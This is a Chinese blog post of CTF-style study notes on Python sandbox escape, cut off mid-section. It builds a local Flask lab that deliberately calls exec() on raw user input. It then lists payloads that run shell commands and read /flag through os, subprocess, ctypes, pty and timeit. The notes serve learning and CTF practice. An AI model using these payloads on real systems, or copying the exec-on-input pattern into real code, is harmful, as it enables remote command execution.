<!DOCTYPE html><html lang="zh-CN"><head><meta charset="UTF-8"/><meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=2"/><meta name="theme-color" content="#222"/><meta http-equiv="X-UA-COMPATIBLE" content="IE=edge,chrome=1"/><meta name="renderer" content="webkit"/><link rel="icon" type="image/ico" sizes="32x32" href="/assets/favicon.ico"/><link rel="apple-touch-icon" sizes="180x180" href="/assets/apple-touch-icon.png"/><link rel="alternate" href="/rss.xml" title="欢迎来到ZLARYY的个人博客，或许里面有什么好玩的东西~" type="application/rss+xml"><link rel="alternate" href="/atom.xml" title="欢迎来到ZLARYY的个人博客，或许里面有什么好玩的东西~" type="application/atom+xml"><link rel="alternate" type="application/json" title="欢迎来到ZLARYY的个人博客，或许里面有什么好玩的东西~" href="https://zlaryy.top/feed.json"/><link rel="preconnect" href="https://s4.zstatic.net"/><link rel="preconnect" href="https://at.alicdn.com"/><link rel="modulepreload" href="/js/siteInit.js"></link><link rel="modulepreload" href="/js/nyx-player-HIXTN7KD.js"></link><link rel="modulepreload" href="/js/copy-tex-4AIDXWNJ.js"></link><link rel="modulepreload" href="/js/post-MYXPIC3N.js"></link><link rel="modulepreload" href="/js/chunk-T54OBHW4.js"></link><link rel="modulepreload" href="/js/index.esm-22UB7CNZ.js"></link><link rel="modulepreload" href="/js/chunk-HJSTZ4VX.js"></link><link rel="modulepreload" href="/js/chunk-ALXQBZTY.js"></link><link rel="stylesheet" href="/css/siteInit.css" media="none" onload="this.media&#x3D;&#39;all&#39;"></link><link rel="preload" href="/assets/picture4.jpg" as="image" fetchpriority="high"><link rel="preload" href="/assets/picture5.png" as="image" fetchpriority="high"><link rel="preload" href="/assets/picture3.png" as="image" fetchpriority="high"><link rel="preload" href="/assets/picture2.png" as="image" fetchpriority="high"><link rel="preload" href="/assets/picture1.jpg" as="image" fetchpriority="high"><link rel="preload" href="/assets/picture1.jpg" as="image" fetchpriority="high"><meta name="keywords" content="Web安全"/><meta name="description" content="Web安全 / CTF / 个人学习笔记"/><link rel="canonical" href="https://zlaryy.top/2026/03/27/%E6%B2%99%E7%AE%B1%E9%80%83%E9%80%B8/"><link rel="stylesheet" href="/css/post.css?v=0.5.4"><link rel="stylesheet" href="/css/mermaid.css?v=0.5.4"><!-- 临时处理--><link rel="stylesheet" media="none" onload="this.media='all'" href="https://s4.zstatic.net/ajax/libs/KaTeX/0.16.9/katex.min.css"><title>沙箱逃逸</title><!-- hexo injector head_end start --><link rel="stylesheet" href="https://npm.elemecdn.com/lxgw-wenkai-screen-webfont/style.css">
<link rel="stylesheet" href="/css/custom.css"><!-- hexo injector head_end end --><meta name="generator" content="Hexo 7.3.0"></head><body itemscope itemtype="http://schema.org/WebPage"><div id="loading"><div class="cat"><div class="body"></div><div class="head"><div class="face"></div></div><div class="foot"><div class="tummy-end"></div><div class="bottom"></div><div class="legs left"></div><div class="legs right"></div></div><div class="paw"><div class="hands left"></div><div class="hands right"></div></div></div></div><div id="pagefind_mount"></div><div id="container"><header id="header" itemscope itemtype="http://schema.org/WPHeader"><div class="inner"><div id="brand"><div class="pjax"><h1 itemprop="name headline">沙箱逃逸</h1><div class="meta"><span class="item" title="创建时间：2026-03-27 12:05:00"><span class="icon"><i class="ic i-calendar"></i></span><span class="text">发表于</span><time itemprop="dateCreated datePublished" datetime="2026-03-27T12:05:00+08:00">2026-03-27</time></span><span class="item" title="本文字数"><span class="icon"><i class="ic i-pen"></i></span><span class="text">本文字数</span><span>8.3k</span><span class="text">字</span></span><span class="item" title="阅读时长"><span class="icon"><i class="ic i-clock"></i></span><span class="text">阅读时长</span><span>8 分钟</span></span></div></div></div><nav id="nav"><div class="inner"><div class="toggle"><div class="lines" aria-label="切换导航栏"><span class="line"></span><span class="line"></span><span class="line"></span></div></div><ul class="menu"><li class="item title"><a href="/" rel="start">ZLARYY</a></li></ul><ul class="right" id="rightNav"><li class="item theme"><i class="ic i-sun"></i></li><li class="item search"><i class="ic i-search"></i></li></ul></div></nav></div><div class="pjax" id="imgs"><ul><li class="item" style="background-image: url(&quot;/assets/picture4.jpg&quot;);"></li><li class="item" style="background-image: url(&quot;/assets/picture5.png&quot;);"></li><li class="item" style="background-image: url(&quot;/assets/picture3.png&quot;);"></li><li class="item" style="background-image: url(&quot;/assets/picture2.png&quot;);"></li><li class="item" style="background-image: url(&quot;/assets/picture1.jpg&quot;);"></li><li class="item" style="background-image: url(&quot;/assets/picture1.jpg&quot;);"></li></ul></div></header><div id="waves"><svg class="waves" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 24 150 28" preserveAspectRatio="none" shape-rendering="auto"><defs><path id="gentle-wave" d="M-160 44c30 0 58-18 88-18s 58 18 88 18 58-18 88-18 58 18 88 18 v44h-352z"></path></defs><g class="parallax"><use xlink:href="#gentle-wave" x="48" y="0"></use><use xlink:href="#gentle-wave" x="48" y="3"></use><use xlink:href="#gentle-wave" x="48" y="5"></use><use xlink:href="#gentle-wave" x="48" y="7"></use></g></svg></div><main><div class="inner"><div class="pjax" id="main"><div class="article wrap"><div class="breadcrumb" itemListElement itemscope itemtype="https://schema.org/BreadcrumbList"><i class="ic i-home"></i><span><a href="/">首页</a></span></div><article class="post block" itemscope="itemscope" itemtype="http://schema.org/Article" data-pagefind-body="data-pagefind-body" lang="zh-CN"><link itemprop="mainEntityOfPage" href="https://zlaryy.top/2026/03/27/%E6%B2%99%E7%AE%B1%E9%80%83%E9%80%B8/"/><span hidden="hidden" itemprop="author" itemscope="itemscope" itemtype="http://schema.org/Person"><meta itemprop="image" content="/assets/avertar.png"/><meta itemprop="name" content="ZLARYY"/><meta itemprop="description" content=", Web安全 / CTF / 个人学习笔记"/></span><span hidden="hidden" itemprop="publisher" itemscope="itemscope" itemtype="http://schema.org/Organization"><meta itemprop="name" content="欢迎来到ZLARYY的个人博客，或许里面有什么好玩的东西~"/></span><div class="body md" itemprop="articleBody"><h1 id="沙箱逃逸"><a class="anchor" href="#沙箱逃逸">#</a> 沙箱逃逸</h1>
<p>参考：<a target="_blank" rel="noopener" href="https://www.freebuf.com/articles/web/422169.html">https://www.freebuf.com/articles/web/422169.html</a></p>
<p><a target="_blank" rel="noopener" href="https://www.freebuf.com/articles/system/203208.html">https://www.freebuf.com/articles/system/203208.html</a></p>
<p>沙箱是一种安全机制，用于为运行中的程序提供一个隔离的环境</p>
<p>系统把不信任的程序（比如网页上的 JavaScript、下载的未知文件、或者某个特定的应用）放在沙箱里运行。在这个环境里，程序只能访问被严格限制的资源（如少量的内存、特定的临时文件夹），它无法读取私人文件、修改操作系统核心设置或感染其他程序。</p>
<p>那么沙箱逃逸就是指被隔离在沙箱内部的恶意代码，利用了沙箱本身的漏洞或配置缺陷，<strong>打破了隔离边界，成功获取了沙箱外部系统（宿主机操作系统）的访问权限</strong>。</p>
<p>这里我在kali虚拟机上直接搭建了一个形似CTF题目环境的本地测试页面：</p>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-python"><span class="line"><span style="color:#A0ADA0;--shiki-dark:#758575DD"># app.py</span></span>
<span class="line"><span style="color:#1E754F;--shiki-dark:#4D9375">from</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE"> flask </span><span style="color:#1E754F;--shiki-dark:#4D9375">import</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE"> Flask</span><span style="color:#999999;--shiki-dark:#666666">,</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE"> request</span><span style="color:#999999;--shiki-dark:#666666">,</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE"> render_template_string</span></span>
<span class="line"><span style="color:#1E754F;--shiki-dark:#4D9375">import</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE"> sys</span></span>
<span class="line"><span style="color:#1E754F;--shiki-dark:#4D9375">import</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE"> io</span></span>
<span class="line"></span>
<span class="line"><span style="color:#393A34;--shiki-dark:#DBD7CAEE">app </span><span style="color:#999999;--shiki-dark:#666666">=</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE"> Flask</span><span style="color:#2993a3;--shiki-dark:#5eaab5">(</span><span style="color:#998418;--shiki-dark:#B8A965">__name__</span><span style="color:#2993a3;--shiki-dark:#5eaab5">)</span></span>
<span class="line"></span>
<span class="line"><span style="color:#A0ADA0;--shiki-dark:#758575DD"># 这是一个极简的 HTML 前端模板，自带黑客风样式</span></span>
<span class="line"><span style="color:#A65E2B;--shiki-dark:#C99076">HTML_TEMPLATE</span><span style="color:#999999;--shiki-dark:#666666"> =</span><span style="color:#B5695977;--shiki-dark:#C98A7D77"> """</span></span>
<span class="line"><span style="color:#B56959;--shiki-dark:#C98A7D">&#x3C;!DOCTYPE html></span></span>
<span class="line"><span style="color:#B56959;--shiki-dark:#C98A7D">&#x3C;html></span></span>
<span class="line"><span style="color:#B56959;--shiki-dark:#C98A7D">&#x3C;head></span></span>
<span class="line"><span style="color:#B56959;--shiki-dark:#C98A7D">    &#x3C;title>在线 PyJail 靶场&#x3C;/title></span></span>
<span class="line"><span style="color:#B56959;--shiki-dark:#C98A7D">    &#x3C;style></span></span>
<span class="line"><span style="color:#B56959;--shiki-dark:#C98A7D">        body &#123; font-family: monospace; background: #1e1e1e; color: #d4d4d4; padding: 20px; &#125;</span></span>
<span class="line"><span style="color:#B56959;--shiki-dark:#C98A7D">        textarea &#123; width: 100%; height: 200px; background: #2d2d2d; color: #00ff00; border: 1px solid #555; padding: 10px; font-family: inherit; font-size: 16px;&#125;</span></span>
<span class="line"><span style="color:#B56959;--shiki-dark:#C98A7D">        input[type="submit"] &#123; background: #007acc; color: white; border: none; padding: 10px 20px; cursor: pointer; margin-top: 10px; font-size: 16px;&#125;</span></span>
<span class="line"><span style="color:#B56959;--shiki-dark:#C98A7D">        input[type="submit"]:hover &#123; background: #005f9e; &#125;</span></span>
<span class="line"><span style="color:#B56959;--shiki-dark:#C98A7D">        pre &#123; background: #000; padding: 15px; border-left: 5px solid #00ff00; overflow-x: auto; color: #00ff00;&#125;</span></span>
<span class="line"><span style="color:#B56959;--shiki-dark:#C98A7D">    &#x3C;/style></span></span>
<span class="line"><span style="color:#B56959;--shiki-dark:#C98A7D">&#x3C;/head></span></span>
<span class="line"><span style="color:#B56959;--shiki-dark:#C98A7D">&#x3C;body></span></span>
<span class="line"><span style="color:#B56959;--shiki-dark:#C98A7D">    &#x3C;h2>🐍 危险的在线 Python 沙箱 (Web RCE)&#x3C;/h2></span></span>
<span class="line"><span style="color:#B56959;--shiki-dark:#C98A7D">    &#x3C;p>在此输入你的 Python Payload：&#x3C;/p></span></span>
<span class="line"><span style="color:#B56959;--shiki-dark:#C98A7D">    &#x3C;form method="POST"></span></span>
<span class="line"><span style="color:#B56959;--shiki-dark:#C98A7D">        &#x3C;textarea name="code" placeholder="输入 Python 代码，例如: print('Hello Hacker!')">&#x3C;/textarea>&#x3C;br></span></span>
<span class="line"><span style="color:#B56959;--shiki-dark:#C98A7D">        &#x3C;input type="submit" value="执行代码 (Execute)"></span></span>
<span class="line"><span style="color:#B56959;--shiki-dark:#C98A7D">    &#x3C;/form></span></span>
<span class="line"><span style="color:#B56959;--shiki-dark:#C98A7D">    </span></span>
<span class="line"><span style="color:#B56959;--shiki-dark:#C98A7D">    &#x3C;!--swig￼0--></span></span>
<span class="line"><span style="color:#B56959;--shiki-dark:#C98A7D">&#x3C;/body></span></span>
<span class="line"><span style="color:#B56959;--shiki-dark:#C98A7D">&#x3C;/html></span></span>
<span class="line"><span style="color:#B5695977;--shiki-dark:#C98A7D77">"""</span></span>
<span class="line"></span>
<span class="line"><span style="color:#999999;--shiki-dark:#666666">@</span><span style="color:#59873A;--shiki-dark:#80A665">app</span><span style="color:#999999;--shiki-dark:#666666">.</span><span style="color:#59873A;--shiki-dark:#80A665">route</span><span style="color:#2993a3;--shiki-dark:#5eaab5">(</span><span style="color:#B5695977;--shiki-dark:#C98A7D77">'</span><span style="color:#B56959;--shiki-dark:#C98A7D">/</span><span style="color:#B5695977;--shiki-dark:#C98A7D77">'</span><span style="color:#999999;--shiki-dark:#666666">,</span><span style="color:#B07D48;--shiki-dark:#BD976A"> methods</span><span style="color:#999999;--shiki-dark:#666666">=</span><span style="color:#1e754f;--shiki-dark:#4d9375">[</span><span style="color:#B5695977;--shiki-dark:#C98A7D77">'</span><span style="color:#B56959;--shiki-dark:#C98A7D">GET</span><span style="color:#B5695977;--shiki-dark:#C98A7D77">'</span><span style="color:#999999;--shiki-dark:#666666">,</span><span style="color:#B5695977;--shiki-dark:#C98A7D77"> '</span><span style="color:#B56959;--shiki-dark:#C98A7D">POST</span><span style="color:#B5695977;--shiki-dark:#C98A7D77">'</span><span style="color:#1e754f;--shiki-dark:#4d9375">]</span><span style="color:#2993a3;--shiki-dark:#5eaab5">)</span></span>
<span class="line"><span style="color:#AB5959;--shiki-dark:#CB7676">def</span><span style="color:#59873A;--shiki-dark:#80A665"> index</span><span style="color:#2993a3;--shiki-dark:#5eaab5">(</span><span style="color:#2993a3;--shiki-dark:#5eaab5">)</span><span style="color:#999999;--shiki-dark:#666666">:</span></span>
<span class="line"><span style="color:#393A34;--shiki-dark:#DBD7CAEE">    result </span><span style="color:#999999;--shiki-dark:#666666">=</span><span style="color:#1E754F;--shiki-dark:#4D9375"> None</span></span>
<span class="line"><span style="color:#1E754F;--shiki-dark:#4D9375">    if</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE"> request</span><span style="color:#999999;--shiki-dark:#666666">.</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE">method </span><span style="color:#AB5959;--shiki-dark:#CB7676">==</span><span style="color:#B5695977;--shiki-dark:#C98A7D77"> '</span><span style="color:#B56959;--shiki-dark:#C98A7D">POST</span><span style="color:#B5695977;--shiki-dark:#C98A7D77">'</span><span style="color:#999999;--shiki-dark:#666666">:</span></span>
<span class="line"><span style="color:#A0ADA0;--shiki-dark:#758575DD">        # 1. 获取用户在网页文本框里填写的代码</span></span>
<span class="line"><span style="color:#393A34;--shiki-dark:#DBD7CAEE">        code </span><span style="color:#999999;--shiki-dark:#666666">=</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE"> request</span><span style="color:#999999;--shiki-dark:#666666">.</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE">form</span><span style="color:#999999;--shiki-dark:#666666">.</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE">get</span><span style="color:#2993a3;--shiki-dark:#5eaab5">(</span><span style="color:#B5695977;--shiki-dark:#C98A7D77">'</span><span style="color:#B56959;--shiki-dark:#C98A7D">code</span><span style="color:#B5695977;--shiki-dark:#C98A7D77">'</span><span style="color:#999999;--shiki-dark:#666666">,</span><span style="color:#B5695977;--shiki-dark:#C98A7D77"> ''</span><span style="color:#2993a3;--shiki-dark:#5eaab5">)</span></span>
<span class="line"><span style="color:#393A34;--shiki-dark:#DBD7CAEE">        </span></span>
<span class="line"><span style="color:#A0ADA0;--shiki-dark:#758575DD">        # 2. 准备捕获 Python 的标准输出 (将 print 的内容拦截下来显示在网页上)</span></span>
<span class="line"><span style="color:#393A34;--shiki-dark:#DBD7CAEE">        old_stdout </span><span style="color:#999999;--shiki-dark:#666666">=</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE"> sys</span><span style="color:#999999;--shiki-dark:#666666">.</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE">stdout</span></span>
<span class="line"><span style="color:#393A34;--shiki-dark:#DBD7CAEE">        redirected_output </span><span style="color:#999999;--shiki-dark:#666666">=</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE"> sys</span><span style="color:#999999;--shiki-dark:#666666">.</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE">stdout </span><span style="color:#999999;--shiki-dark:#666666">=</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE"> io</span><span style="color:#999999;--shiki-dark:#666666">.</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE">StringIO</span><span style="color:#2993a3;--shiki-dark:#5eaab5">(</span><span style="color:#2993a3;--shiki-dark:#5eaab5">)</span></span>
<span class="line"><span style="color:#393A34;--shiki-dark:#DBD7CAEE">        </span></span>
<span class="line"><span style="color:#1E754F;--shiki-dark:#4D9375">        try</span><span style="color:#999999;--shiki-dark:#666666">:</span></span>
<span class="line"><span style="color:#A0ADA0;--shiki-dark:#758575DD">            # 3. 核心漏洞：没有任何过滤，直接执行用户输入的代码！</span></span>
<span class="line"><span style="color:#998418;--shiki-dark:#B8A965">            exec</span><span style="color:#2993a3;--shiki-dark:#5eaab5">(</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE">code</span><span style="color:#2993a3;--shiki-dark:#5eaab5">)</span></span>
<span class="line"><span style="color:#393A34;--shiki-dark:#DBD7CAEE">            </span></span>
<span class="line"><span style="color:#A0ADA0;--shiki-dark:#758575DD">            # 4. 获取执行期间所有 print 出来的内容</span></span>
<span class="line"><span style="color:#393A34;--shiki-dark:#DBD7CAEE">            result </span><span style="color:#999999;--shiki-dark:#666666">=</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE"> redirected_output</span><span style="color:#999999;--shiki-dark:#666666">.</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE">getvalue</span><span style="color:#2993a3;--shiki-dark:#5eaab5">(</span><span style="color:#2993a3;--shiki-dark:#5eaab5">)</span></span>
<span class="line"><span style="color:#1E754F;--shiki-dark:#4D9375">            if</span><span style="color:#AB5959;--shiki-dark:#CB7676"> not</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE"> result</span><span style="color:#999999;--shiki-dark:#666666">:</span></span>
<span class="line"><span style="color:#393A34;--shiki-dark:#DBD7CAEE">                result </span><span style="color:#999999;--shiki-dark:#666666">=</span><span style="color:#B5695977;--shiki-dark:#C98A7D77"> "</span><span style="color:#B56959;--shiki-dark:#C98A7D">[执行成功，但没有输出任何内容]</span><span style="color:#B5695977;--shiki-dark:#C98A7D77">"</span></span>
<span class="line"><span style="color:#393A34;--shiki-dark:#DBD7CAEE">                </span></span>
<span class="line"><span style="color:#1E754F;--shiki-dark:#4D9375">        except</span><span style="color:#998418;--shiki-dark:#B8A965"> Exception</span><span style="color:#1E754F;--shiki-dark:#4D9375"> as</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE"> e</span><span style="color:#999999;--shiki-dark:#666666">:</span></span>
<span class="line"><span style="color:#A0ADA0;--shiki-dark:#758575DD">            # 如果代码报错，把错误信息返回给网页</span></span>
<span class="line"><span style="color:#393A34;--shiki-dark:#DBD7CAEE">            result </span><span style="color:#999999;--shiki-dark:#666666">=</span><span style="color:#AB5959;--shiki-dark:#CB7676"> f</span><span style="color:#B56959;--shiki-dark:#C98A7D">"[运行报错] </span><span style="color:#2993a3;--shiki-dark:#5eaab5">&#123;</span><span style="color:#998418;--shiki-dark:#B8A965">str</span><span style="color:#1e754f;--shiki-dark:#4d9375">(</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE">e</span><span style="color:#1e754f;--shiki-dark:#4d9375">)</span><span style="color:#2993a3;--shiki-dark:#5eaab5">&#125;</span><span style="color:#B56959;--shiki-dark:#C98A7D">"</span></span>
<span class="line"><span style="color:#1E754F;--shiki-dark:#4D9375">        finally</span><span style="color:#999999;--shiki-dark:#666666">:</span></span>
<span class="line"><span style="color:#A0ADA0;--shiki-dark:#758575DD">            # 5. 恢复系统的标准输出（重要收尾工作）</span></span>
<span class="line"><span style="color:#393A34;--shiki-dark:#DBD7CAEE">            sys</span><span style="color:#999999;--shiki-dark:#666666">.</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE">stdout </span><span style="color:#999999;--shiki-dark:#666666">=</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE"> old_stdout</span></span>
<span class="line"><span style="color:#393A34;--shiki-dark:#DBD7CAEE">            </span></span>
<span class="line"><span style="color:#1E754F;--shiki-dark:#4D9375">    return</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE"> render_template_string</span><span style="color:#2993a3;--shiki-dark:#5eaab5">(</span><span style="color:#A65E2B;--shiki-dark:#C99076">HTML_TEMPLATE</span><span style="color:#999999;--shiki-dark:#666666">,</span><span style="color:#B07D48;--shiki-dark:#BD976A"> result</span><span style="color:#999999;--shiki-dark:#666666">=</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE">result</span><span style="color:#2993a3;--shiki-dark:#5eaab5">)</span></span>
<span class="line"></span>
<span class="line"><span style="color:#1E754F;--shiki-dark:#4D9375">if</span><span style="color:#998418;--shiki-dark:#B8A965"> __name__</span><span style="color:#AB5959;--shiki-dark:#CB7676"> ==</span><span style="color:#B5695977;--shiki-dark:#C98A7D77"> '</span><span style="color:#B56959;--shiki-dark:#C98A7D">__main__</span><span style="color:#B5695977;--shiki-dark:#C98A7D77">'</span><span style="color:#999999;--shiki-dark:#666666">:</span></span>
<span class="line"><span style="color:#A0ADA0;--shiki-dark:#758575DD">    # 启动 Web 服务，监听 5000 端口</span></span>
<span class="line"><span style="color:#393A34;--shiki-dark:#DBD7CAEE">    app</span><span style="color:#999999;--shiki-dark:#666666">.</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE">run</span><span style="color:#2993a3;--shiki-dark:#5eaab5">(</span><span style="color:#B07D48;--shiki-dark:#BD976A">host</span><span style="color:#999999;--shiki-dark:#666666">=</span><span style="color:#B5695977;--shiki-dark:#C98A7D77">'</span><span style="color:#B56959;--shiki-dark:#C98A7D">0.0.0.0</span><span style="color:#B5695977;--shiki-dark:#C98A7D77">'</span><span style="color:#999999;--shiki-dark:#666666">,</span><span style="color:#B07D48;--shiki-dark:#BD976A"> port</span><span style="color:#999999;--shiki-dark:#666666">=</span><span style="color:#2F798A;--shiki-dark:#4C9A91">5000</span><span style="color:#999999;--shiki-dark:#666666">,</span><span style="color:#B07D48;--shiki-dark:#BD976A"> debug</span><span style="color:#999999;--shiki-dark:#666666">=</span><span style="color:#1E754F;--shiki-dark:#4D9375">True</span><span style="color:#2993a3;--shiki-dark:#5eaab5">)</span></span></code></pre>
<h1 id="命令执行"><a class="anchor" href="#命令执行">#</a> 命令执行</h1>
<p>python中可以执行系统命令的有：</p>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-text"><span class="line"><span>os</span></span>
<span class="line"><span></span></span>
<span class="line"><span>commands：仅限2.x</span></span>
<span class="line"><span></span></span>
<span class="line"><span>subprocess</span></span>
<span class="line"><span></span></span>
<span class="line"><span>timeit：timeit.sys、timeit.timeit("__import__('os').system('whoami')", number=1)</span></span>
<span class="line"><span></span></span>
<span class="line"><span>platform：platform.os、platform.sys、platform.popen('whoami', mode='r', bufsize=-1).read()</span></span>
<span class="line"><span></span></span>
<span class="line"><span>pty：pty.spawn('ls')、pty.os</span></span>
<span class="line"><span></span></span>
<span class="line"><span>bdb：bdb.os、cgi.sys</span></span>
<span class="line"><span></span></span>
<span class="line"><span>cgi：cgi.os、cgi.sys</span></span>
<span class="line"><span>...</span></span></code></pre>
<h2 id="os"><a class="anchor" href="#os">#</a> os</h2>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-text"><span class="line"><span>import os 引入python标准库中的os模块</span></span>
<span class="line"><span>result=os.popen('cat /flag').read() 执行命令并将命令执行结果塞入到管道中，通过read()转换为字符串赋值给result变量</span></span>
<span class="line"><span>print(result) 输出命令执行的结果</span></span>
<span class="line"><span></span></span>
<span class="line"><span>在某些条件下也可以使用：</span></span>
<span class="line"><span>import os</span></span>
<span class="line"><span>os.system('cat /flag')</span></span>
<span class="line"><span>可能会导致执行shell命令不会返回shell的输出</span></span></code></pre>
<p><img loading="lazy" src="/2026/03/27/%E6%B2%99%E7%AE%B1%E9%80%83%E9%80%B8/1.png" class=""></p>
<h2 id="commands"><a class="anchor" href="#commands">#</a> commands</h2>
<p>commands命令是python2.x版本下可以使用的：</p>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-text"><span class="line"><span>import commands</span></span>
<span class="line"><span>commands.getstatusoutput("ls") 执行系统命令，并只返回命令的输出结果（字符串）</span></span>
<span class="line"><span>commands.getoutput("ls") 执行系统命令，并返回一个元组 (Tuple)：(状态码, 输出结果)</span></span>
<span class="line"><span>commands.getstatus("ls") 执行了 ls -ld 文件名，返回这个文件的权限和属性信息</span></span></code></pre>
<h2 id="ctypes"><a class="anchor" href="#ctypes">#</a> ctypes</h2>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-text"><span class="line"><span>import ctypes</span></span>
<span class="line"><span>ctypes.CDLL(None).system('cat /flag'.encode())</span></span>
<span class="line"><span>上面这串payload同样可以执行成功但是没有回显</span></span></code></pre>
<p><img loading="lazy" src="/2026/03/27/%E6%B2%99%E7%AE%B1%E9%80%83%E9%80%B8/2.png" class=""></p>
<h2 id="subprocess"><a class="anchor" href="#subprocess">#</a> subprocess</h2>
<p>通过这个模块我们可以更方便看到命令执行的回显内容</p>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-text"><span class="line"><span>import subprocess 引入Python的子进程管理模块</span></span>
<span class="line"><span>print(subprocess.getoutput('cat /flag'))</span></span>
<span class="line"><span>这行代码会开辟一个子进程去启动Linux shell，之后他会将输出端接上管道转换为字符串用print输出出来</span></span></code></pre>
<p><img loading="lazy" src="/2026/03/27/%E6%B2%99%E7%AE%B1%E9%80%83%E9%80%B8/3.png" class=""></p>
<p>除此之外我们可以利用</p>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-text"><span class="line"><span>import subprocess</span></span>
<span class="line"><span># capture_output=True 负责把数据截获下来，text=True 负责把字节流转成字符串</span></span>
<span class="line"><span>result = subprocess.run('cat /flag', shell=True, capture_output=True, text=True)</span></span>
<span class="line"><span>print(result.stdout)</span></span></code></pre>
<p><img loading="lazy" src="/2026/03/27/%E6%B2%99%E7%AE%B1%E9%80%83%E9%80%B8/4.png" class=""></p>
<p>还有：</p>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-text"><span class="line"><span>import subprocess</span></span>
<span class="line"><span># 1. 启动进程，并强行把它的标准输出 (stdout) 接上一根内部pipe (subprocess.PIPE)</span></span>
<span class="line"><span>proc = subprocess.Popen('cat /flag', shell=True, stdout=subprocess.PIPE)</span></span>
<span class="line"><span># 2. 读取pipe里的内容，并解码成字符串</span></span>
<span class="line"><span># communicate()[0] 是获取标准输出的标准做法，并且它会等待命令执行完毕</span></span>
<span class="line"><span>result = proc.communicate()[0].decode()</span></span>
<span class="line"><span>print(result)</span></span></code></pre>
<p><img loading="lazy" src="/2026/03/27/%E6%B2%99%E7%AE%B1%E9%80%83%E9%80%B8/5.png" class=""></p>
<h2 id="pty"><a class="anchor" href="#pty">#</a> pty</h2>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-text"><span class="line"><span>import pty</span></span>
<span class="line"><span>pty.spawn("ls")</span></span></code></pre>
<p>这种payload直接输入也是没有回显的，除非我们将他输出的字符串写入到其他文件中，并且利用python的文件读取功能：</p>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-text"><span class="line"><span>import pty</span></span>
<span class="line"><span>import os</span></span>
<span class="line"><span>pty.spawn(['/bin/sh', '-c', 'cat /flag > /tmp/1.txt'])</span></span>
<span class="line"><span>result = open('/tmp/1.txt').read()</span></span>
<span class="line"><span>print(result)</span></span></code></pre>
<p><img loading="lazy" src="/2026/03/27/%E6%B2%99%E7%AE%B1%E9%80%83%E9%80%B8/6.png" class=""></p>
<p>值得注意的是：<code>pty.spawn</code>会将整个字符串当作文件名执行，如果我们传入<code>pty.spawn(&quot;cat /flag&quot;)</code>，那么他就会去寻找<code>cat /flag</code>这个可执行文件，所以我们必须使用列表的形式传给他：</p>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-text"><span class="line"><span>pty.spawn(['cat', '/flag'])</span></span></code></pre>
<h2 id="timeit"><a class="anchor" href="#timeit">#</a> timeit</h2>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-text"><span class="line"><span>import timeit</span></span>
<span class="line"><span>timeit.timeit("__import__('os').system('dir')",number=1)</span></span></code></pre>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-text"><span class="line"><span>import timeit</span></span>
